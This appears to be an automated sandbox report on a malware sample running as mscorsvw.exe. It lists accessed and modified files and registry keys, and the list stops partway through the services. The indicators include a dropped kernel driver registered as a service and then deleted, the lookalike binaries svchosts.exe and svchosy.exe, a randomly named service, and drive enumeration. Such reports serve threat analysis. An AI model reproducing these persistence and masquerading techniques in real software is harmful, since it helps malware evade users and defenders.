mscorsvw.exe PID: 2020, 上一级进程 PID: 432

访问的文件
  • C:\
  • C:\Users\test\AppData\Local\Temp\ComputerZ_x64.sys
  • C:\Windows\svchosts.exe
  • C:\Users\test\AppData\Local\Temp\kernel32.dll
  • \??\Sandy64
  • C:\Users\test\AppData\Local\Temp\12087907
  • C:\Users\test\AppData\Local\Temp\12087907\....\
  • C:\Users\test\AppData\Local\Temp\12087907\....\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\12087907\TemporaryFile
  • C:\Windows\Fonts\staticcache.dat
  • C:\Windows\svchosy.exe
  • B:
  • D:
  • E:
  • F:
  • G:
  • H:
  • I:
  • J:
  • K:
  • L:
  • M:
  • N:
  • O:
  • P:
  • Q:
  • R:
  • S:
  • T:
  • U:
  • V:
  • W:
  • X:
  • Y:
  • Z:
  • [:
  • \??\Nsi
  • C:\Windows\Temp
  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
  • C:\Windows\ServiceProfiles
  • C:\Windows\ServiceProfiles\LocalService
  • C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp
  • C:\Windows\ServiceProfiles\NetworkService
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ndpsetup.bat
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ndpsetup.bat
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat
读取的文件
  • \??\Sandy64
  • C:\Users\test\AppData\Local\Temp\ComputerZ_x64.sys
  • C:\Users\test\AppData\Local\Temp\12087907\....\
  • C:\Windows\Fonts\staticcache.dat
  • C:\Windows\svchosy.exe
修改的文件
  • C:\Users\test\AppData\Local\Temp\ComputerZ_x64.sys
  • C:\Windows\svchosts.exe
  • \??\Sandy64
  • C:\Users\test\AppData\Local\Temp\12087907\....\TemporaryFile
  • C:\Users\test\AppData\Local\Temp\12087907\TemporaryFile
  • C:\Windows\svchosy.exe
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat
删除的文件
  • C:\Users\test\AppData\Local\Temp\ComputerZ_x64.sys
注册表键
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ComputerZ_x64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DisplayName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ComputerZ_x64\Security
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Security\Security
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane9
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane10
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane11
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane12
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane13
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane14
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane15
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\SimSun\Plane16
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\13131313.exe
  • HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3FC47A08-E5C9-4BCA-A2C7-BC9A282AED14}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
  • HKEY_CURRENT_USER
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
  • HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
  • HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
  • HKEY_CURRENT_USER\Software\Microsoft\CTF\LayoutIcon\0804\00000804
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sd sdf kjsdf otgkl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sd sdf kjsdf otgkl\MarkTime
  • HKEY_LOCAL_MACHINE\SYSTEM\Setup
  • HKEY_LOCAL_MACHINE\SYSTEM\Setup\Host
  • HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  • HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{860BB310-5D01-11D0-BD3B-00A0C911CE86}
  • HKEY_CLASSES_ROOT\CLSID
  • HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance
  • HKEY_CLASSES_ROOT\DirectShow\MediaObjects
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\DirectShow\MediaObjects\Categories\860bb310-5d01-11d0-bd3b-00a0c911ce86
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo3
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo5
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo6
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo7
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo8
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32\msvideo9
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\3b57caa1b150cbb56ea37fcd8ef35c44
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
  • HKEY_USERS\S-1-5-18
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_USERS\.DEFAULT\Environment
  • HKEY_USERS\.DEFAULT\Volatile Environment
  • HKEY_USERS\.DEFAULT\Volatile Environment\0
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator
